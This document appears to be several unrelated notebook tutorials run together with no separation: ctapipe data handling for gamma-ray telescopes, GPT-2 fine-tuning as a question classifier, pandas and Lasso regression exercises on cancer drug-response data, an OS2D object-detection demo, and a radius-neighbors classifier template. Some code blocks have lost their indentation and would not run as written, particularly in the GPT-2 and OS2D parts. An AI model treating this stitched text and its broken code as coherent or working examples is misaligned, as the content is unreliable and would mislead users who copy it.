# Getting Started with ctapipe
This hands-on was presented at the Paris CTA Consortium meeting (K. Kosack)
## Part 1: load and loop over data
```
from ctapipe.io import event_source
from ctapipe import utils
from matplotlib import pyplot as plt
%matplotlib inline
path = utils.get_dataset_path("gamma_test_large.simtel.gz")
for event in event_source(path, max_events=4):
    print(event.count, event.r0.event_id, event.mc.energy)
event
event.r0
for event in event_source(path, max_events=4):
    print(event.count, event.r0.tels_with_data)
event.r0.tel[2]
r0tel = event.r0.tel[2]
r0tel.waveform
r0tel.waveform.shape
```
note that this is ($N_{channels}$, $N_{pixels}$, $N_{samples}$)
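To make the axis convention concrete, here is a dummy array with the same layout (the sizes below are made up for illustration, not read from the file):

```python
import numpy as np

# Fake R0 waveform: 2 gain channels, 1855 pixels, 30 samples
waveform = np.zeros((2, 1855, 30))

print(waveform[0].shape)      # all pixel traces of channel 0 -> (1855, 30)
print(waveform[0, 10].shape)  # trace of pixel 10 in channel 0 -> (30,)
```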
```
plt.pcolormesh(r0tel.waveform[0])
plt.plot(r0tel.waveform[0,10])
from ipywidgets import interact
@interact
def view_waveform(chan=0, pix_id=200):
    plt.plot(r0tel.waveform[chan, pix_id])
```
Exercise: try modifying this to compare two waveforms.
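One possible starting point for the exercise, written as a plain function so it can also be wrapped with `@interact`; the random array below stands in for the real `r0tel.waveform`:

```python
import numpy as np
import matplotlib.pyplot as plt

def compare_waveforms(waveform, chan=0, pix_a=10, pix_b=11):
    """Plot two pixel traces from the same channel and return them."""
    trace_a = waveform[chan, pix_a]
    trace_b = waveform[chan, pix_b]
    plt.plot(trace_a, label=f"pixel {pix_a}")
    plt.plot(trace_b, label=f"pixel {pix_b}")
    plt.legend()
    return trace_a, trace_b

# In the notebook, pass r0tel.waveform instead of this fake array
fake = np.random.rand(2, 1855, 30)
a, b = compare_waveforms(fake, chan=0, pix_a=100, pix_b=200)
```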
## Part 2: Explore the instrument description
This is all well and good, but we don't really know what camera or telescope this is... how do we get the instrument description info?
Currently this is returned *inside* the event (it will change to be delivered separately in an upcoming version)
```
subarray = event.inst.subarray # soon EventSource will give you event, subarray separate
subarray
subarray.peek()
subarray.to_table()
subarray.tel[2]
subarray.tel[2].camera
subarray.tel[2].optics
tel = subarray.tel[2]
tel.camera
tel.optics
tel.camera.geometry.pix_x
tel.camera.geometry.to_table()
tel.optics.mirror_area
from ctapipe.visualization import CameraDisplay
disp = CameraDisplay(tel.camera.geometry)
disp = CameraDisplay(tel.camera.geometry)
disp.image = r0tel.waveform[0,:,10]  # display channel 0, sample 10 (try other samples)
```
**Aside:** show a demo using a `CameraDisplay` in interactive mode in IPython rather than in the notebook
## Part 3: Apply some calibration and trace integration
```
from ctapipe.calib import CameraCalibrator
calib = CameraCalibrator(subarray=subarray)
for event in event_source(path, max_events=4):
    calib(event)  # fills in r1, dl0, and dl1
    print(event.dl1.tel.keys())
event.dl1.tel[2]
dl1tel = event.dl1.tel[2]
dl1tel.image.shape # note this will be gain-selected in next version, so will be just 1D array of 1855
dl1tel.pulse_time
CameraDisplay(tel.camera.geometry, image=dl1tel.image)
CameraDisplay(tel.camera.geometry, image=dl1tel.pulse_time)
```
Now for Hillas Parameters
```
from ctapipe.image import hillas_parameters, tailcuts_clean
image = dl1tel.image
mask = tailcuts_clean(tel.camera.geometry, image, picture_thresh=10, boundary_thresh=5)
mask
CameraDisplay(tel.camera.geometry, image=mask)
cleaned = image.copy()
cleaned[~mask] = 0
disp = CameraDisplay(tel.camera.geometry, image=cleaned)
disp.cmap = plt.cm.coolwarm
disp.add_colorbar()
plt.xlim(-1.0,0)
plt.ylim(0,1.0)
params = hillas_parameters(tel.camera.geometry, cleaned)
print(params)
disp = CameraDisplay(tel.camera.geometry, image=cleaned)
disp.cmap = plt.cm.coolwarm
disp.add_colorbar()
plt.xlim(-1.0,0)
plt.ylim(0,1.0)
disp.overlay_moments(params, color='white', lw=2)
```
## Part 4: Let's put it all together:
- loop over events, selecting only telescopes of the same type (e.g. LST:LSTCam)
- for each event, apply calibration/trace integration
- calculate Hillas parameters
- write out all Hillas parameters to a file that can be loaded with Pandas
First let's select only those telescopes of type LST:LSTCam
```
subarray.telescope_types
subarray.get_tel_ids_for_type("LST_LST_LSTCam")
```
Now let's write our program
```
data = utils.get_dataset_path("gamma_test_large.simtel.gz")
source = event_source(data, allowed_tels=[1,2,3,4], max_events=10) # remove the max_events limit to get more stats
for event in source:
    calib(event)
    for tel_id, tel_data in event.dl1.tel.items():
        tel = event.inst.subarray.tel[tel_id]
        mask = tailcuts_clean(tel.camera.geometry, tel_data.image)
        params = hillas_parameters(tel.camera.geometry[mask], tel_data.image[mask])
from ctapipe.io import HDF5TableWriter
with HDF5TableWriter(filename='hillas.h5', group_name='dl1', overwrite=True) as writer:
    for event in event_source(data, allowed_tels=[1,2,3,4], max_events=10):
        calib(event)
        for tel_id, tel_data in event.dl1.tel.items():
            tel = event.inst.subarray.tel[tel_id]
            mask = tailcuts_clean(tel.camera.geometry, tel_data.image)
            params = hillas_parameters(tel.camera.geometry[mask], tel_data.image[mask])
            writer.write("hillas", params)
```
### We can now load in the file we created and plot it
```
!ls *.h5
import pandas as pd
hillas = pd.read_hdf("hillas.h5", key='/dl1/hillas')
hillas
_ = hillas.hist(figsize=(8,8))
```
If you do this yourself, loop over more events to get better statistics
<a href="https://colab.research.google.com/github/daveshap/QuestionDetector/blob/main/QuestionDetector.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# Compile Training Data
Note: Generate the raw data with [this notebook](https://github.com/daveshap/QuestionDetector/blob/main/DownloadGutenbergTop100.ipynb)
```
import re
import random
datafile = '/content/drive/My Drive/Gutenberg/sentence_data.txt'
corpusfile = '/content/drive/My Drive/Gutenberg/corpus_data.txt'
testfile = '/content/drive/My Drive/Gutenberg/test_data.txt'
sample_cnt = 3000
test_cnt = 30
questions = list()
exclamations = list()
other = list()
with open(datafile, 'r', encoding='utf-8') as infile:
    body = infile.read()
sentences = re.split('\n\n', body)
for i in sentences:
    if 'í' in i or 'á' in i:
        continue
    if '?' in i:
        questions.append(i)
    elif '!' in i:
        exclamations.append(i)
    else:
        other.append(i)
def flatten_sentence(text):
    text = text.lower()
    fa = re.findall(r'[\w\s]', text)
    return ''.join(fa)

def compose_corpus(data, count, label):
    result = ''
    random.seed()
    subset = random.sample(data, count)
    for i in subset:
        result += '<|SENTENCE|> %s <|LABEL|> %s <|END|>\n\n' % (flatten_sentence(i), label)
    return result
corpus = compose_corpus(questions, sample_cnt, 'question')
corpus += compose_corpus(exclamations, sample_cnt, 'other')
corpus += compose_corpus(other, sample_cnt, 'other')
with open(corpusfile, 'w', encoding='utf-8') as outfile:
outfile.write(corpus)
print('Done!', corpusfile)
corpus = compose_corpus(questions, test_cnt, 'question')
corpus += compose_corpus(exclamations, test_cnt, 'other')
corpus += compose_corpus(other, test_cnt, 'other')
with open(testfile, 'w', encoding='utf-8') as outfile:
outfile.write(corpus)
print('Done!', testfile)
```
# Finetune Model
Finetune GPT-2
```
!pip install tensorflow-gpu==1.15.0 --quiet
!pip install gpt-2-simple --quiet
import gpt_2_simple as gpt2
# note: manually mount your google drive in the file explorer to the left
model_dir = '/content/drive/My Drive/GPT2/models'
checkpoint_dir = '/content/drive/My Drive/GPT2/checkpoint'
#model_name = '124M'
model_name = '355M'
#model_name = '774M'
gpt2.download_gpt2(model_name=model_name, model_dir=model_dir)
print('\n\nModel is ready!')
run_name = 'QuestionDetector'
step_cnt = 4000
sess = gpt2.start_tf_sess()
gpt2.finetune(sess,
dataset=corpusfile,
model_name=model_name,
model_dir=model_dir,
checkpoint_dir=checkpoint_dir,
steps=step_cnt,
restore_from='fresh', # start from scratch
#restore_from='latest', # continue from last work
run_name=run_name,
print_every=50,
sample_every=1000,
save_every=1000
)
```
# Test Results
| Run | Model | Steps | Samples | Last Loss | Avg Loss | Accuracy |
|---|---|---|---|---|---|---|
| 01 | 124M | 2000 | 9000 | 0.07 | 0.69 | 71.4% |
| 02 | 355M | 2000 | 9000 | 0.24 | 1.63 | 66% |
| 03 | 355M | 4000 | 9000 | 0.06 | 0.83 | 58% |
| 04 | 355M | 4000 | 9000 | 0.11 | 0.68 | 74.4% |
Larger models seem to need more steps and/or data. The model performs very well on questions and less well on the other classes. Run 04 was reduced to 2 classes.
```
right = 0
wrong = 0
print('Loading test set...')
with open(testfile, 'r', encoding='utf-8') as file:
    test_set = file.readlines()
for t in test_set:
    t = t.strip()
    if t == '':
        continue
    prompt = t.split('<|LABEL|>')[0] + '<|LABEL|>'
    expect = t.split('<|LABEL|>')[1].replace('<|END|>', '').strip()
    #print('\nPROMPT:', prompt)
    response = gpt2.generate(sess,
                             return_as_list=True,
                             length=30,  # prevent it from going too crazy
                             prefix=prompt,
                             model_name=model_name,
                             model_dir=model_dir,
                             truncate='\n',  # stop inferring here
                             include_prefix=False,
                             checkpoint_dir=checkpoint_dir)[0]
    response = response.strip()
    if expect in response:
        right += 1
    else:
        wrong += 1
    print('right:', right, '\twrong:', wrong, '\taccuracy:', right / (right + wrong))
    #print('RESPONSE:', response)
print('\n\nModel:', model_name)
print('Samples:', sample_cnt * 3)  # 3 classes of sample_cnt training samples each
print('Steps:', step_cnt)
```
# Preliminaries
The `pandas` library allows the user several data structures for different data manipulation tasks:
1. Data storage through its `Series` and `DataFrame` data structures.
2. Data filtering using multiple methods from the package.
3. Reading data from many different file formats such as `csv`, `txt`, `xlsx`, ...
Below we provide a brief overview of the `pandas` functionalities needed for these exercises. The complete documentation can be found on the [`pandas` website](https://pandas.pydata.org/).
## Pandas data structures
### Series
The Pandas `Series` data structure is similar to a one-dimensional array. It can store any type of data. The values are mutable, but the size is not.
To create a `Series`, we call `pd.Series()` and pass an array. A `Series` may also be created from a NumPy array.
```
import pandas as pd
import numpy as np
first_series = pd.Series([1,10,100,1000])
print(first_series)
teams = np.array(['PSV','Ajax','Feyenoord','Twente'])
second_series = pd.Series(teams)
print('\n')
print(second_series)
```
### DataFrame
One can think of a `DataFrame` as a table with rows and columns (2D structure). The columns can be of a different type (as opposed to `numpy` arrays) and the size of the `DataFrame` is mutable.
To create a `DataFrame`, we call `pd.DataFrame()`; we can build it from scratch, or convert a NumPy array or a list into a `DataFrame`.
```
# DataFrame from scratch
first_dataframe = pd.DataFrame({
"Position": [1, 2, 3, 4],
"Team": ['PSV','Ajax','Feyenoord','Twente'],
"GF": [80, 75, 75, 70],
"GA": [30, 25, 40, 60],
"Points": [79, 78, 70, 66]
})
print("From scratch: \n {} \n".format(first_dataframe))
# DataFrame from a list
data = [[1, 2, 3, 4], ['PSV','Ajax','Feyenoord','Twente'],
[80, 75, 75, 70], [30, 25, 40, 60], [79, 78, 70, 66]]
columns = ["Position", "Team", "GF", "GA", "Points"]
second_dataframe = pd.DataFrame(data, index=columns)
print("From list: \n {} \n".format(second_dataframe.T)) # the '.T' operator is explained later on
# DataFrame from numpy array
data = np.array([[1, 2, 3, 4], ['PSV','Ajax','Feyenoord','Twente'],
[80, 75, 75, 70], [30, 25, 40, 60], [79, 78, 70, 66]])
columns = ["Position", "Team", "GF", "GA", "Points"]
third_dataframe = pd.DataFrame(data.T, columns=columns)
print("From numpy array: \n {} \n".format(third_dataframe))
```
### DataFrame attributes
This section gives a quick overview of some of the `pandas.DataFrame` attributes such as `T`, `index`, `columns`, `iloc`, `loc`, `shape` and `values`.
```
# transpose the index and columns
print(third_dataframe.T)
# index makes reference to the row labels
print(third_dataframe.index)
# columns makes reference to the column labels
print(third_dataframe.columns)
# iloc accesses rows/columns by integer location (e.g. all team names, which are in the second column)
print(third_dataframe.iloc[:,1])
# loc accesses rows/columns by label (e.g. the team name in row 0 of the "Team" column)
print(third_dataframe.loc[0, 'Team'])
# shape returns a tuple with the DataFrame dimension, similar to numpy
print(third_dataframe.shape)
# values returns a NumPy representation of the DataFrame data
print(third_dataframe.values)
```
### DataFrame methods
This section gives a quick overview of some of the `pandas.DataFrame` methods such as `head`, `describe`, `concat`, `groupby`,`rename`, `filter`, `drop` and `isna`. To import data from CSV or MS Excel files, we can make use of `read_csv` and `read_excel`, respectively.
```
# print the first few rows in your dataset with head()
print(third_dataframe.head()) # In this case, it is not very useful because we don't have thousands of rows
# get the summary statistics of the DataFrame with describe()
print(third_dataframe.describe())
# concatenate (join) DataFrame objects using concat()
# first, we will split the above DataFrame in two different ones
df_a = third_dataframe.loc[[0,1],:]
df_b = third_dataframe.loc[[2,3],:]
print(df_a)
print('\n')
print(df_b)
print('\n')
# now, we concatenate both datasets
df = pd.concat([df_a, df_b])
print(df)
# group the data by certain variable via groupby()
# here, we have grouped the data by goals for, which in this case is 75
group = df.groupby('GF')
print(group.get_group('75'))
# rename() helps you change the column or index names
print(df.rename(columns={'Position':'Pos','Team':'Club'}))
# build a subset of rows or columns of your dataset according to labels via filter()
# here, items refer to the variable names: 'Team' and 'Points'; to select columns, we specify axis=1
print(df.filter(items=['Team', 'Points'], axis=1))
# dropping some labels
print(df.drop(columns=['GF', 'GA']))
# search for NA (not available) entries in the DataFrame
print(df.isna()) # No NA values
print('\n')
# create a pandas Series with a NA value
# name the Series W (winning matches)
tmp = pd.Series([np.NaN, 25, 24, 19], name="W")
# concatenate the Series with the DataFrame
df = pd.concat([df,tmp], axis = 1)
print(df)
print('\n')
# again, check for NA entries
print(df.isna())
```
## Dataset
For this week's exercises we will use a dataset from the Genomics of Drug Sensitivity in Cancer (GDSC) project (https://www.cancerrxgene.org/). In this study (Iorio et al., Cell, 2016), 265 compounds were tested on 1001 cancer cell lines for which different types of -omics data (RNA expression, DNA methylation, Copy Number Alteration, DNA sequencing) are available. This is a valuable resource for finding biomarkers of drug sensitivity, in order to understand why cancer patients respond very differently to cancer drugs and to find ways to assign the optimal treatment to each patient.
For this exercise we will use a subset of the data, focusing on the response to the drug YM155 (Sepantronium bromide) in four cancer types, for a total of 148 cancer cell lines.
| ID | Cancer type |
|-------------|----------------------------------|
| COAD/READ | Colorectal adenocarcinoma |
| NB | Neuroblastoma |
| KIRC | Kidney renal clear cell carcinoma|
| BRCA | Breast carcinoma |
We will use the RNA expression data (RMA normalised). Only genes with high variability across cell lines (variance > 5, resulting in 238 genes) have been kept.
Drugs have been tested at different concentrations, measuring each time the viability of the cells. Drug sensitivity is measured using the natural log of the fitted IC50 metric, which is defined as the half maximal inhibitory concentration. A lower IC50 corresponds to a more sensitive cell line, because a lower amount of drug is sufficient to produce a strong response, while a higher IC50 corresponds to a more resistant cell line, because more drug is needed to kill the cells.
Based on the IC50 metric, cells can be classified as sensitive or resistant. The classification is done by computing the $z$-score across all cell lines in the GDSC for each drug, and considering as sensitive the ones with $z$-score < 0 and resistant the ones with $z$-score > 0.
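The classification rule described above can be sketched as follows (the log(IC50) values below are made up for illustration):

```python
import numpy as np
import pandas as pd

# Hypothetical log(IC50) values for a handful of cell lines
ic50 = pd.Series([-2.1, 0.3, 1.5, -0.7, 0.9], name="LN_IC50")

z = (ic50 - ic50.mean()) / ic50.std()           # z-score across cell lines
labels = np.where(z < 0, "sensitive", "resistant")
print(list(labels))
```

Cell lines below the mean log(IC50) get a negative z-score and are called sensitive; the ones above are called resistant.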
The dataset is originally provided as 3 files ([original source](https://www.sciencedirect.com/science/article/pii/S0092867416307462?via%3Dihub)) :
`GDSC_RNA_expression.csv`: gene expression matrix with the cell lines in the rows (148) and the genes in the columns (238).
`GDSC_drug_response.csv`: vector with the cell lines response to the drug YM155 in terms of log(IC50) and as classification in sensitive or resistant.
`GDSC_metadata.csv`: metadata for the 148 cell lines including name, COSMIC ID and tumor type (using the classification from ['The Cancer Genome Atlas TCGA'](https://www.cancer.gov/about-nci/organization/ccg/research/structural-genomics/tcga))
For convenience, we provide the data already curated.
`RNA_expression_curated.csv`: [148 cell lines , 238 genes]
`drug_response_curated.csv`: [148 cell lines , YM155 drug]
The curated data can be read as `pandas` `DataFrame`s in the following way:
```
import pandas as pd
gene_expression = pd.read_csv("./data/RNA_expression_curated.csv", sep=',', header=0, index_col=0)
drug_response = pd.read_csv("./data/drug_response_curated.csv", sep=',', header=0, index_col=0)
```
You can use the `DataFrame`s directly as inputs to the `sklearn` models. The advantage over using `numpy` arrays is that the variables are annotated, i.e. each input and output has a name.
## Tools
The `scikit-learn` library provides the required tools for linear regression/classification and shrinkage, as well as for logistic regression.
```
from sklearn.linear_model import LinearRegression
from sklearn.linear_model import Ridge
from sklearn.linear_model import Lasso
from sklearn.linear_model import LogisticRegression
```
Note that the notation used for the hyperparameters in the `scikit-learn` library is different from the one used in the lecture. More specifically, in the lecture $\alpha$ is the tunable parameter to select the compromise between Ridge and Lasso. Whereas, `scikit-learn` library refers to `alpha` as the tunable parameter $\lambda$. Please check the documentation for more details.
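As a sanity check of this naming, for a single standardized feature and no intercept the `scikit-learn` Lasso objective $\frac{1}{2n}\lVert y - Xw\rVert^2 + \alpha\lVert w\rVert_1$ has a closed-form soft-thresholding solution, with `alpha` playing the role of the lecture's $\lambda$ (a sketch, not part of the exercises):

```python
import numpy as np
from sklearn.linear_model import Lasso

rng = np.random.default_rng(0)
n = 500
x = rng.normal(size=n)
x = (x - x.mean()) / x.std()           # standardize so that x.x / n == 1
y = 0.5 * x + rng.normal(scale=0.1, size=n)
y = y - y.mean()                       # center y so no intercept is needed

alpha = 0.1
rho = (x @ y) / n                      # (1/n) <x, y>
w_closed_form = np.sign(rho) * max(abs(rho) - alpha, 0.0)  # soft threshold

w_sklearn = Lasso(alpha=alpha, fit_intercept=False, tol=1e-10).fit(
    x.reshape(-1, 1), y).coef_[0]
print(w_closed_form, w_sklearn)
```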
# Exercises
## Selection of the hyperparameter
Implement cross-validation (using `sklearn.model_selection.GridSearchCV`) to select the `alpha` hyperparameter of `sklearn.linear_model.Lasso`.
## Feature selection
Look at the features selected using the hyperparameter which corresponds to the minimum cross-validation error.
<p><font color='#770a0a'>Is the partition in training and validation sets playing a role in the selection of the hyperparameter? How will this affect the selection of the relevant features?</font></p>
**Answer**: The partition in itself has no direct relation to the selection of the hyperparameter (see the graph with selection frequency), as these partitions are averaged in the hyperparameter selection. Nevertheless, the selected features may be sensitive to this partition. Therefore, it is useful to repeat cross-validation multiple times (using bootstrap).
<p><font color='#770a0a'>Should the value of the intercept also be shrunk to zero with Lasso and Ridge regression? Motivate your answer.</font></p>
**Answer**: No, this should not be done, because then the optimization procedure would become dependent on the origin chosen for the output variable $\mathbf{y}$. For example, adding a constant value to your training $\mathbf{y}$, would not result in an addition of this constant value for the predictions. This would be the case for a non-penalized intercept.
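This argument can be checked numerically with `Ridge`, whose intercept is unpenalized by default: shifting the training targets by a constant shifts every prediction by exactly that constant, which would not hold if the intercept were shrunk.

```python
import numpy as np
from sklearn.linear_model import Ridge

rng = np.random.default_rng(1)
X = rng.normal(size=(100, 5))
y = X @ rng.normal(size=5) + rng.normal(scale=0.1, size=100)

c = 7.0  # constant added to the training targets
pred = Ridge(alpha=1.0).fit(X, y).predict(X)
pred_shifted = Ridge(alpha=1.0).fit(X, y + c).predict(X)
print(np.allclose(pred_shifted, pred + c))  # the intercept absorbs the shift
```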
## Bias-variance
Show the effect of the regularization on the parameter estimates in terms of bias and variance. For this you can repeat the optimization 100 times using bootstrap and visualise the profile of the Lasso regression coefficient over a grid of the hyperparameter, optionally including the variability as error bars.
<p><font color='#770a0a'>Based on the visual analysis of the plot, what are your observation on bias and variance in relation to model complexity? Motivate your answer.</font></p>
**Answer**: For a low $\alpha$, many parameters are included, leading to a complex model with high variance. As $\alpha$ increases, the amount and values of the parameters decrease, leading to a less complex model. A less and less complex model increases the bias, but decreases the variance.
## Logistic regression
<p><font color='#770a0a'>Write the expression of the objective function for the penalized logistic regression with $L_1$ and $L_2$ regularisation (as in Elastic net).</font></p>
**Logistic Regression with Elastic net**
$$\max_{\beta_0, \beta} \left\{ \sum^{N}_{i=1} \left[y_i\left(\beta_0 + \beta^T x_i\right) - \log{\left(1+e^{\beta_0 + \beta^T x_i}\right)}\right]-\left[\lambda_1 \sum_{j=1}^{p} |\beta_j | + \lambda_2 \sum_{j=1}^{p} \beta_j^2 \right] \right\}$$
**Selection of the Hyperparameter $\alpha$**
```
import sys
sys.path.append('code/')
from week_3_utils import *
import numpy as np
from sklearn.model_selection import train_test_split
import matplotlib.pyplot as plt
X_train, X_test, y_train, y_test = train_test_split(gene_expression, drug_response, test_size=0.2, random_state=40)
alpha_range = np.linspace(10e-4,1,num=100)
model = cv_lasso(alpha_range,folds=5)
model.fit(X_train, y_train)
print(model.best_estimator_)
```
**Feature Selection**
```
features = gene_expression.columns
counter = np.zeros((1,len(features)))
amt_of_rep = 5
for ix in range(amt_of_rep):
    alpha_range = np.linspace(10e-4, 1, num=50)
    model = cv_lasso(alpha_range, folds=5)
    model.fit(X_train, y_train)
    coefficients = model.best_estimator_.named_steps['lasso'].coef_
    nonzero_coef = np.array((coefficients != 0.)).astype(int)
    counter = counter + nonzero_coef
    print(f'{ix} of {amt_of_rep-1}')
counter = counter.ravel()
features_in_plot = features[counter != 0]
counters_in_plot = counter[counter != 0]
#print(features_in_plot)
plt.bar(list(range(0,4*len(features_in_plot),4)), counters_in_plot/amt_of_rep, tick_label=features_in_plot)
plt.xticks(rotation=30)
plt.ylabel('Fraction of Selection')
plt.show()
```
**Bias-Variance**
```
from sklearn.utils import resample
from week_3_utils import lasso_estimator
n_bootstrap = 100
samplesize = 80
alpha_range = np.linspace(0,3,num=100)
coef = np.zeros((len(alpha_range),n_bootstrap,len(gene_expression.columns)))
for j in range(n_bootstrap):
    x_bs, y_bs = resample(X_train, y_train, replace=True, n_samples=samplesize)
    for i, alpha in enumerate(alpha_range):
        model_bs = lasso_estimator(alpha=alpha)
        model_bs.fit(x_bs, y_bs)
        coef[i, j, :] = model_bs.named_steps['lasso'].coef_
average_coef = np.mean(coef, axis=1)
std_coef = np.std(coef, axis=1)
for k in range(len(gene_expression.columns)):
    plt.plot(alpha_range, average_coef[:, k], linewidth=0.5)
plt.xlabel('alpha')
plt.ylabel('Coefficients')
plt.show()
```
This is a demo illustrating an application of the OS2D method on one image.
Demo assumes the OS2D code is [installed](./INSTALL.md).
```
import os
import argparse
import matplotlib.pyplot as plt
import torch
import torchvision.transforms as transforms
from os2d.modeling.model import build_os2d_from_config
from os2d.config import cfg
import os2d.utils.visualization as visualizer
from os2d.structures.feature_map import FeatureMapSize
from os2d.utils import setup_logger, read_image, get_image_size_after_resize_preserving_aspect_ratio
logger = setup_logger("OS2D")
# use GPU if available
cfg.is_cuda = torch.cuda.is_available()
```
Download the trained model (if the script does not work, download it from [Google Drive](https://drive.google.com/open?id=1l_aanrxHj14d_QkCpein8wFmainNAzo8) and put it at models/os2d_v2-train.pth). See [README](./README.md) for links to the other released models.
```
!./os2d/utils/wget_gdrive.sh models/os2d_v2-train.pth 1l_aanrxHj14d_QkCpein8wFmainNAzo8
cfg.init.model = "models/os2d_v2-train.pth"
net, box_coder, criterion, img_normalization, optimizer_state = build_os2d_from_config(cfg)
```
Get the image where to detect and two class images.
```
input_image = read_image("data/demo/input_image.jpg")
class_images = [read_image("data/demo/class_image_0.jpg"),
read_image("data/demo/class_image_1.jpg")]
class_ids = [0, 1]
```
Use torchvision to convert images to torch.Tensor and to apply normalization.
```
transform_image = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize(img_normalization["mean"], img_normalization["std"])
])
```
Prepare the input image
```
h, w = get_image_size_after_resize_preserving_aspect_ratio(h=input_image.size[1],
w=input_image.size[0],
target_size=1500)
input_image = input_image.resize((w, h))
input_image_th = transform_image(input_image)
input_image_th = input_image_th.unsqueeze(0)
if cfg.is_cuda:
input_image_th = input_image_th.cuda()
```
Prepare the class images
```
class_images_th = []
for class_image in class_images:
h, w = get_image_size_after_resize_preserving_aspect_ratio(h=class_image.size[1],
w=class_image.size[0],
target_size=cfg.model.class_image_size)
class_image = class_image.resize((w, h))
class_image_th = transform_image(class_image)
if cfg.is_cuda:
class_image_th = class_image_th.cuda()
class_images_th.append(class_image_th)
```
Run the network with one command
```
with torch.no_grad():
loc_prediction_batch, class_prediction_batch, _, fm_size, transform_corners_batch = net(images=input_image_th, class_images=class_images_th)
```
Alternatively, one can run the stages of the model separately, which is convenient, e.g., for sharing class feature extraction between many input images.
```
# with torch.no_grad():
# feature_map = net.net_feature_maps(input_image_th)
# class_feature_maps = net.net_label_features(class_images_th)
# class_head = net.os2d_head_creator.create_os2d_head(class_feature_maps)
# loc_prediction_batch, class_prediction_batch, _, fm_size, transform_corners_batch = net(class_head=class_head,
# feature_maps=feature_map)
```
Convert images organized in batches into images organized in pyramid levels. This is not needed in this demo, but is essential when using multiple images in a batch and multiple pyramid levels.
```
image_loc_scores_pyramid = [loc_prediction_batch[0]]
image_class_scores_pyramid = [class_prediction_batch[0]]
img_size_pyramid = [FeatureMapSize(img=input_image_th)]
transform_corners_pyramid = [transform_corners_batch[0]]
```
Decode network outputs into detection boxes
```
boxes = box_coder.decode_pyramid(image_loc_scores_pyramid, image_class_scores_pyramid,
img_size_pyramid, class_ids,
nms_iou_threshold=cfg.eval.nms_iou_threshold,
nms_score_threshold=cfg.eval.nms_score_threshold,
transform_corners_pyramid=transform_corners_pyramid)
# remove some fields to lighten visualization
boxes.remove_field("default_boxes")
# note that the system outputs the correlations (which lie in the [-1, 1] segment) as the detection scores (the higher, the better the detection)
scores = boxes.get_field("scores")
```
Show class images
```
figsize = (8, 8)
fig=plt.figure(figsize=figsize)
columns = len(class_images)
for i, class_image in enumerate(class_images):
fig.add_subplot(1, columns, i + 1)
plt.imshow(class_image)
plt.axis('off')
```
Show fixed number of detections that are above a certain threshold. Yellow rectangles show detection boxes. Each box has a class label and the detection scores (the higher the better the detection). Red parallelograms illustrate the affine transformations that align class images to the input image at the location of detection.
```
plt.rcParams["figure.figsize"] = figsize
cfg.visualization.eval.max_detections = 8
cfg.visualization.eval.score_threshold = float("-inf")
visualizer.show_detections(boxes, input_image,
cfg.visualization.eval)
```
# RadiusNeighborsClassifier with MinMaxScaler
This code template is for a classification task using a simple radius neighbors classifier, with the data scaled by MinMaxScaler. It implements learning based on the number of neighbors within a fixed radius r of each training point, where r is a floating-point value specified by the user.
### Required Packages
```
!pip install imblearn
import warnings
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as se
from imblearn.over_sampling import RandomOverSampler
from sklearn.preprocessing import LabelEncoder, MinMaxScaler
from sklearn.model_selection import train_test_split
from sklearn.neighbors import RadiusNeighborsClassifier
from sklearn.pipeline import make_pipeline
from sklearn.metrics import classification_report,plot_confusion_matrix
warnings.filterwarnings('ignore')
```
### Initialization
Filepath of CSV file
```
#filepath
file_path= ""
```
List of features required for model training.
```
#x_values
features=[]
```
Target feature for prediction.
```
#y_value
target=''
```
### Data Fetching
Pandas is an open-source, BSD-licensed library providing high-performance, easy-to-use data manipulation and data analysis tools.
We will use the pandas library to read the CSV file from its storage path, and use the head function to display the first few rows.
```
df=pd.read_csv(file_path)
df.head()
```
### Feature Selections
Feature selection is the process of reducing the number of input variables when developing a predictive model, both to reduce the computational cost of modelling and, in some cases, to improve the performance of the model.
We will assign all the required input features to X and target/outcome to Y.
```
X = df[features]
Y = df[target]
```
### Data Preprocessing
Since most machine learning models in the sklearn library do not handle string categorical data or null values, we have to explicitly remove or replace them. The snippet below defines functions that remove null values if any exist, and convert string classes in the dataset by encoding them as integer classes.
```
def NullClearner(df):
    if isinstance(df, pd.Series) and (df.dtype in ["float64", "int64"]):
        df.fillna(df.mean(), inplace=True)
        return df
    elif isinstance(df, pd.Series):
        df.fillna(df.mode()[0], inplace=True)
        return df
    else:
        return df

def EncodeX(df):
    return pd.get_dummies(df)

def EncodeY(df):
    if len(df.unique()) <= 2:
        return df
    else:
        un_EncodedT = np.sort(pd.unique(df), axis=-1, kind='mergesort')
        df = LabelEncoder().fit_transform(df)
        EncodedT = [xi for xi in range(len(un_EncodedT))]
        print("Encoded Target: {} to {}".format(un_EncodedT, EncodedT))
        return df

x = X.columns.to_list()
for i in x:
    X[i] = NullClearner(X[i])
X = EncodeX(X)
Y = EncodeY(NullClearner(Y))
X.head()
```
#### Correlation Map
In order to check the correlation between the features, we will plot a correlation matrix. It is effective in summarizing a large amount of data where the goal is to see patterns.
```
f,ax = plt.subplots(figsize=(18, 18))
matrix = np.triu(X.corr())
se.heatmap(X.corr(), annot=True, linewidths=.5, fmt= '.1f',ax=ax, mask=matrix)
plt.show()
```
#### Distribution Of Target Variable
```
plt.figure(figsize = (10,6))
se.countplot(Y)
```
### Data Splitting
The train-test split is a procedure for evaluating the performance of an algorithm. The procedure involves taking a dataset and dividing it into two subsets. The first subset is utilized to fit/train the model. The second subset is used for prediction. The main motive is to estimate the performance of the model on new data.
```
x_train,x_test,y_train,y_test=train_test_split(X,Y,test_size=0.2,random_state=123)
```
#### Handling Target Imbalance
The challenge of working with imbalanced datasets is that most machine learning techniques will ignore, and in turn have poor performance on, the minority class, although typically it is performance on the minority class that is most important.
One approach to addressing imbalanced datasets is to oversample the minority class. The simplest approach involves duplicating examples in the minority class. We will perform oversampling using the imblearn library.
```
x_train,y_train = RandomOverSampler(random_state=123).fit_resample(x_train, y_train)
```
### Model
RadiusNeighborsClassifier implements learning based on the number of neighbors within a fixed radius r of each training point, where r is a floating-point value specified by the user.
In cases where the data is not uniformly sampled, radius-based neighbors classification can be a better choice.
#### Tuning parameters
> **radius**: Range of parameter space to use by default for radius_neighbors queries.
> **algorithm**: Algorithm used to compute the nearest neighbors:
> **leaf_size**: Leaf size passed to BallTree or KDTree.
> **p**: Power parameter for the Minkowski metric.
> **metric**: the distance metric to use for the tree.
> **outlier_label**: label for outlier samples
> **weights**: weight function used in prediction.
